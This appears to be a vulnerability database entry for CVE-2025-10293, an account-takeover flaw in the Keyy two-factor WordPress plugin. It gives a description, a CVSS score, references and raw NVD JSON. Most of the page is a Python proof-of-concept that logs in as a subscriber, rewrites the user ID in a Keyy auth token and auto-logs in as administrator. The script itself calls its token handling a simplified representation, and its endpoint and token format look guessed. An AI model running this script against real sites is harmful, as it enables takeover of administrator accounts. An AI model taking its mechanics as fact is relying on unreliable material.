CVE-2025-10293

Description

The Keyy Two Factor Authentication (like Clef) plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.3. This is due to the plugin not properly validating a user's identity associated with a token generated. This makes it possible for authenticated attackers, with subscriber-level access and above, to generate valid auth tokens and leverage that to auto-login as other accounts, including administrators, as long as the administrator has the 2FA set up.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Keyy Two Factor Authentication plugin <= 1.2.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10293 PoC - Keyy Two Factor Authentication Privilege Escalation
# Vulnerability: Improper token validation allows account takeover
# Affected: Keyy plugin versions <= 1.2.3

import requests
import re
import json

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_USER = "attacker_subscriber"
ATTACKER_PASS = "attacker_password123"
TARGET_ADMIN_ID = 1  # Default WordPress admin user ID

def exploit_keyy_privilege_escalation():
    session = requests.Session()
    
    # Step 1: Login as low-privilege subscriber user
    print("[*] Step 1: Logging in as subscriber-level attacker...")
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        "log": ATTACKER_USER,
        "pwd": ATTACKER_PASS,
        "wp-submit": "Log In",
        "redirect_to": f"{TARGET_URL}/wp-admin/",
        "testcookie": "1"
    }
    session.post(login_url, data=login_data)
    
    # Step 2: Request authentication token from Keyy plugin
    print("[*] Step 2: Requesting auth token from Keyy plugin...")
    # The Keyy plugin generates tokens via its authentication endpoint
    keyy_token_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    token_params = {
        "action": "keyy_get_token",  # Keyy plugin's token generation action
    }
    token_response = session.post(keyy_token_url, data=token_params)
    auth_token = token_response.json().get("token")
    print(f"[+] Obtained auth token: {auth_token[:20]}...")
    
    # Step 3: Manipulate token to target admin user
    print(f"[*] Step 3: Manipulating token to target admin user (ID: {TARGET_ADMIN_ID})...")
    # The vulnerability exists because the plugin does not properly
    # bind the token to the requesting user's identity
    manipulated_token = modify_token_user_id(auth_token, TARGET_ADMIN_ID)
    
    # Step 4: Use manipulated token to auto-login as admin
    print("[*] Step 4: Using manipulated token to auto-login as admin...")
    auto_login_url = f"{TARGET_URL}/?keyy_token={manipulated_token}"
    response = session.get(auto_login_url, allow_redirects=True)
    
    # Step 5: Verify admin access
    admin_check = session.get(f"{TARGET_URL}/wp-admin/users.php")
    if "Administrator" in admin_check.text or "admin" in admin_check.text.lower():
        print("[+] SUCCESS! Logged in as administrator!")
        return True
    else:
        print("[-] Exploitation failed")
        return False

def modify_token_user_id(token, target_user_id):
    """
    Modify the token's associated user ID.
    Due to improper validation, the Keyy plugin accepts tokens
    with modified user identifiers.
    """
    # Decode and modify the token payload
    # This is a simplified representation of the token manipulation
    parts = token.split(":")
    if len(parts) >= 2:
        parts[1] = str(target_user_id)
    return ":".join(parts)

if __name__ == "__main__":
    exploit_keyy_privilege_escalation()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10293
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10293
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10293/
[4] VulDB https://vuldb.com/cve/CVE-2025-10293
[5] https://wordpress.org/plugins/keyy/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/1850e6bd-04bc-4510-aba9-e51431363231?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10293", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:38.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Keyy Two Factor Authentication (like Clef) plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.3. This is due to the plugin not properly validating a user's identity associated with a token generated. This makes it possible for authenticated attackers, with subscriber-level access and above, to generate valid auth tokens and leverage that to auto-login as other accounts, including administrators, as long as the administrator has the 2FA set up."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://wordpress.org/plugins/keyy/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1850e6bd-04bc-4510-aba9-e51431363231?source=cve", "source": "[email protected]"}]}}